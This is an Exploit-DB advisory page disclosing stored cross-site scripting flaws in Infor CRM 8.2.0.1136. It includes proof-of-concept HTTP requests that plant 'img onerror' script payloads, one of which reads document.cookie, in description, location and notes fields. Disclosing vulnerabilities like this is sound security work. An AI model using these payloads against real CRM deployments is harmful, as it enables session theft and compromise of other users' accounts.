Infor CRM 8.2.0.1136 - Multiple HTML Script Injection Vulnerabilities

EDB-ID:

39497

CVE:

N/A




Platform:

ASHX

Date:

2016-02-26


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.


Infor CRM 8.2.0.1136 Multiple HTML Script Injection Vulnerabilities


Vendor: Infor
Product web page: http://www.infor.com
Affected version: 8.2.0.1136


Summary: Infor® CRM, formerly Saleslogix, is an award-winning
customer relationship management (CRM) solution that provides
a complete view of customer interactions, so your business can
collaborate and respond promptly and knowledgably to customer
inquiries, sales opportunities, and service requests. Infor CRM
includes a robust suite of sales, marketing, and service capabilities,
to offer businesses of all sizes a fast, flexible, and affordable
solution for finding, winning, and growing profitable customer
relationships.

Desc: Infor CRM suffers from multiple stored cross-site scripting
vulnerabilities. Input passed to several POST/PUT parameters in
JSON format is not properly sanitised before being returned to the
user. This can be exploited to execute arbitrary HTML and script
code in a user's browser session in context of an affected site.

Tested on: Microsoft-IIS/8.5
           ASP.NET/4.0.30319


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2016-5308
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5308.php


21.01.2016

---


----------------------------------
Affected parameter(s): description
----------------------------------

PUT /SLXClient/slxdata.ashx/slx/system/-/attachments(%22eUSERA0004IX%22)?_includeFile=false&format=json&_t=1456358980947 HTTP/1.1
Host: intranet.zeroscience.mk


{$updated: "/Date(1456359095000)/", $key: "eUSERA0004IX",…}
"": ""
$descriptor: ""
$etag: "+CgjMLB+0nA="
$httpStatus: 200
$key: "eUSERA0004IX"
$lookup: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments?format=json"
$post: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments?format=json"
$schema: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments/$schema?format=json"
$service: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments/$service?format=json"
$template: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments/$template?format=json"
$updated: "/Date(1456359095000)/"
$url: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments('eUSERA0004IX')"
accountId: null
activityId: null
attachDate: "2016-01-25T00:09:39Z"
contactId: null
contractId: null
createDate: "/Date(1456359095000)/"
createUser: "UUSERA0005W0"
dataType: "R"
defectId: null
description: "<img src=j onerror=confirm(document.cookie) >"
details: {createSource: null}
documentType: null
fileExists: true
fileName: "inforcrm_xss.png"
fileSize: 101722
historyId: null
leadId: null
modifyDate: "/Date(1456359095000)/"
modifyUser: "UUSERA0005W0"
opportunityId: null
physicalFileName: "!eUSERA0004IXinforcrm_xss.png"
productId: null
remoteStatus: null
returnId: null
salesOrderId: null
ticketId: null
url: null
user: {$key: "UUSERA0005W0"}



-----------------------------------------------------------
Affected parameter(s): Description, Location, and LongNotes
-----------------------------------------------------------

POST /SLXClient/slxdata.ashx/slx/system/-/activities?format=json&_t=1456357736977 HTTP/1.1
Host: intranet.zeroscience.mk


{$httpStatus: 200, $descriptor: "", ActivityBasedOn: null, Alarm: false,…}
$descriptor: ""
$httpStatus: 200
AccountId: null
AccountName: null
ActivityAttendees: {}
ActivityBasedOn: null
Alarm: false
AlarmTime: "2016-01-24T22:45:00Z"
AllowAdd: true
AllowComplete: true
AllowDelete: true
AllowEdit: true
AllowSync: true
AppId: null
Attachment: false
AttachmentCount: null
AttendeeCount: 0
Category: "Pleasantville"
ContactId: null
ContactName: null
CreateDate: "/Date(-62135596800000)/"
CreateUser: null
Description: "<img src=zsl onerror=prompt(1) >"
Details: {ForeignId1: null, ForeignId2: null, ForeignId3: null, ForeignId4: null, ProjectId: null,…}
ChangeKey: null
CreateSource: null
ForeignId1: null
ForeignId2: null
ForeignId3: null
ForeignId4: null
GlobalSyncId: null
ProjectId: null
Tick: null
UserDef1: null
UserDef2: null
UserDef3: null
Duration: "0"
EndDate: "/Date(1456359315286)/"
LeadId: null
LeadName: null
Leader: {$key: "UUSERA0005W0", $descriptor: "Userovich, User"}
$descriptor: "Userovich, User"
$key: "UUSERA0005W0"
Location: "<img src=zsl onerror=prompt(2) >"
LongNotes: "<img src=zsl onerror=prompt(3) >"
ModifyDate: "/Date(-62135596800000)/"
ModifyUser: null
Notes: "Zero Science Lab"
OpportunityId: null
OpportunityName: null
OriginalDate: "/Date(1456358415286)/"
PhoneNumber: null
Priority: "1"
ProcessId: null
ProcessNode: null
RecurIterations: 0
RecurPeriod: 0
RecurPeriodSpec: 0
RecurSkip: null
RecurrenceState: "rsNotRecurring"
Recurring: false
Resources: {}
Rollover: false
StartDate: "2016-01-25T00:00:05Z"
TicketId: null
TicketNumber: null
Timeless: true
Type: "atToDo"
UserActivities: {}
$url: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/userActivities?format=json&where=Activity.Id%20eq%20%27VUSERA000CZ7%27"
UserNotifications: {}
$url: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/userNotifications?format=json&where=Activity.Id%20eq%20%27VUSERA000CZ7%27"